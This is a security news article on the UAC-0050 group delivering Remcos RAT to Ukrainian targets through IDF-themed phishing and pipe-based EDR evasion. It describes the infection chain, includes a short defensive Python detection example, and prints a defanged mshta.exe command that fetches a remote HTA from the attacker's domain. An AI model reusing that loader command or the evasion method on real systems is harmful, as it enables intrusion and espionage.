February 21, 2024
UAC-0050 Group Disseminates Remcos RAT Through Novel Phishing Techniques

To avoid detection by security software, the threat actor known as UAC-0050 is disseminating Remcos RAT through phishing attacks and new techniques.

Karthickkumar Kathiresan and Shilpesh Trivedi, security researchers at Uptycs, stated in a report released on Wednesday that “the group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal.”

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

Since 2020, UAC-0050 has been utilizing social engineering campaigns to deceive recipients into opening malicious attachments by posing as trusted organizations. These campaigns have historically targeted Ukrainian and Polish entities.

The adversary was linked by the Computer Emergency Response Team of Ukraine (CERT-UA) to a phishing campaign that was intended to distribute Remcos RAT in February 2023.

The identical trojan has been disseminated in at least three separate phishing waves in recent months; during one of these attacks, an information stealer known as Meduza Stealer was also put into action.

Based on an LNK file that it found on December 21, 2023, Uptycs conducted this analysis. It’s believed that the initial access vector, which is still unknown, involved phishing emails directed towards military personnel in Ukraine, purporting to offer consulting positions with the Israel Defence Forces (IDF).

With the help of mshta.exe, a Windows native binary for executing HTA files, the aforementioned LNK file retrieves and launches an HTML application called “6.hta” from a remote server after gathering information about antivirus software installed on the target computer.

This step lets one PowerShell script unpack a second PowerShell script, which downloads the “word_update.exe” and “ofer.docx” files from the domain new-tech-savvy[.]com.

When word_update.exe is run, a copy of itself called fmTask_dbg.exe is made, and persistence is established by adding a shortcut to the new executable in the Windows Startup folder.

To decrypt and launch the Remcos RAT (version 4.9.2 Pro), which can collect system data, cookies, and login credentials from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome, the binary also uses unnamed pipes to enable data exchange between itself and a newly spawned child process for cmd.exe.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers stated.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”

UAC-0050 Targets Ukraine Using Remcos RAT Pipe Technique for Evasion

The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection mechanisms.

RemcosRAT is the group’s preferred tool for espionage; it is a well-known malware designed for remote control and surveillance. In their latest operational twist, the UAC-0050 group has demonstrated their advanced adaptability by integrating a pipe method for interprocess communication. 

Using Windows operating system pipes offers a hidden path for data transfer that deftly avoids detection by antivirus and Endpoint Detection and Response (EDR) programs. This method represents a considerable advancement in the group’s tactics, even though it is not wholly novel.

With its campaign directed toward the Ukrainian government, UAC-0050 has a geopolitical goal in mind. RemcosRAT and the creative data movement techniques involving pipes highlight the group’s emphasis on intelligence gathering and stealth. Although state sponsorship is still a possibility, the group’s actions undoubtedly pose a risk, particularly to government sectors that depend on Windows systems.

On December 21, 2023, the Uptycs platform detected a suspicious .lnk file, prompting our Threat Research Team to launch an investigation. The results of the analysis showed that RemcosRAT was used by UAC-0050 in a targeted cyber intelligence operation against Ukrainian government agencies.

The initial vector of attack remains unidentified, but it appears to be phishing or spam emails disguised as job offers aimed at recruiting Ukrainian military personnel for consulting positions with the Israel Defence Forces (IDF). 

According to the paper (Figure 1), this deceitful strategy involved roles that were primarily focused on teaching IDF soldiers contemporary warfare techniques, which reflected a sophisticated ruse to penetrate military networks.

Early in December 2023, the Ukrainian government formally acknowledged a similar attack pattern, which validates our findings. According to their official website, this incident fits in with UAC-0050’s operational methodology, which reinforces the group’s deliberate and tenacious use of RemcosRAT in their cyberespionage activities.

An HTA file is downloaded in response to a command from the LNK file. This HTA file contains a VBS script that, when it runs, launches a PowerShell script. The goal of this PowerShell script is to download word_update.exe, a malicious payload, from a server. Word_update.exe then runs cmd.exe and uses a pipe to distribute malicious data. As a result, it causes explorer.exe to launch, containing the malicious RemcosRAT in the program’s memory.
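As an added example (not code from the Uptycs report or from this article), the following shows how a defender could surface the chain described above in process-creation telemetry: it finds mshta.exe started with an http(s) URL and lists every process created beneath it. The event records, field names, PIDs, the AppData path and the example.invalid URL are constructed assumptions, and PID reuse is ignored.

```python
import ntpath
import re

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed process-creation records (fields modelled on Sysmon Event ID 1).
# PIDs, the AppData path and the example.invalid URL are made up for illustration.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"c:\windows\system32\mshta.exe http://example.invalid/6.hta"},
    {"pid": 220, "ppid": 210, "cmd": "powershell.exe -w hidden -enc <constructed>",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 230, "ppid": 220, "image": r"C:\Users\u\AppData\Roaming\word_update.exe",
     "cmd": "word_update.exe"},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Tools\inventory.hta"},  # local HTA: not flagged
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c dir"},
]

def name(ev):
    return ntpath.basename(ev["image"]).lower()

def remote_mshta_roots(events):
    """PIDs of mshta.exe processes whose command line carries an http(s) URL."""
    return [e["pid"] for e in events
            if name(e) == "mshta.exe" and URL_RE.search(e["cmd"])]

def descendants(events, root_pid):
    """Every process created, directly or indirectly, under root_pid."""
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    out, stack = [], [root_pid]
    while stack:
        for child in children.get(stack.pop(), []):
            out.append(child)
            stack.append(child["pid"])
    return out

def detect(events):
    """Map each remote-mshta PID to the names of the processes it led to."""
    return {pid: [name(c) for c in descendants(events, pid)]
            for pid in remote_mshta_roots(events)}

if __name__ == "__main__":
    for pid, chain in detect(EVENTS).items():
        print(f"mshta.exe pid={pid} fetched a remote HTA; descendants: {' -> '.join(chain)}")
```

The local-HTA launch (PID 300) and its cmd.exe child stay out of the result, which keeps the rule focused on mshta.exe pulling content over HTTP.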

The investigation starts with a .lnk file. A Windows shortcut file with the extension “.lnk” points to another file, folder, or program. It enables users to swiftly access the linked resource without having to navigate to its location. Hackers can produce files that, although seeming to be shortcuts to trustworthy programs or documents, really point to and run malicious software.

In this instance, information about installed antivirus programs on the target computer is gathered by the malicious .lnk file. It checks to see if “Windows Defender” matches the display name. In that case, an empty string is used in place of the term. Consequently, the ‘if’ statement’s condition turns false, blocking the execution of the ‘exit’ statement. As a result, any further code is carried out by the script without interruption.

The threat actor has obscured the URL string near the end of the .lnk file. MSHTA is then used to execute the string after it has been deobfuscated. Here is the code that will be executed.

c:\windows\system32\mshta.exe http[:]//new-tech-savvy[.]com/6[.]hta

After retrieving the 6.hta file for examination, we learned that it includes a VBScript whose script content is completely obfuscated.

Researchers studying security have uncovered a fresh phishing attempt that has been linked to the Remcos spyware-distributing UAC-0050 and UAC-0096 groups. Fraudulent emails are used in the attack to fool recipients into downloading and installing spyware on their computers.
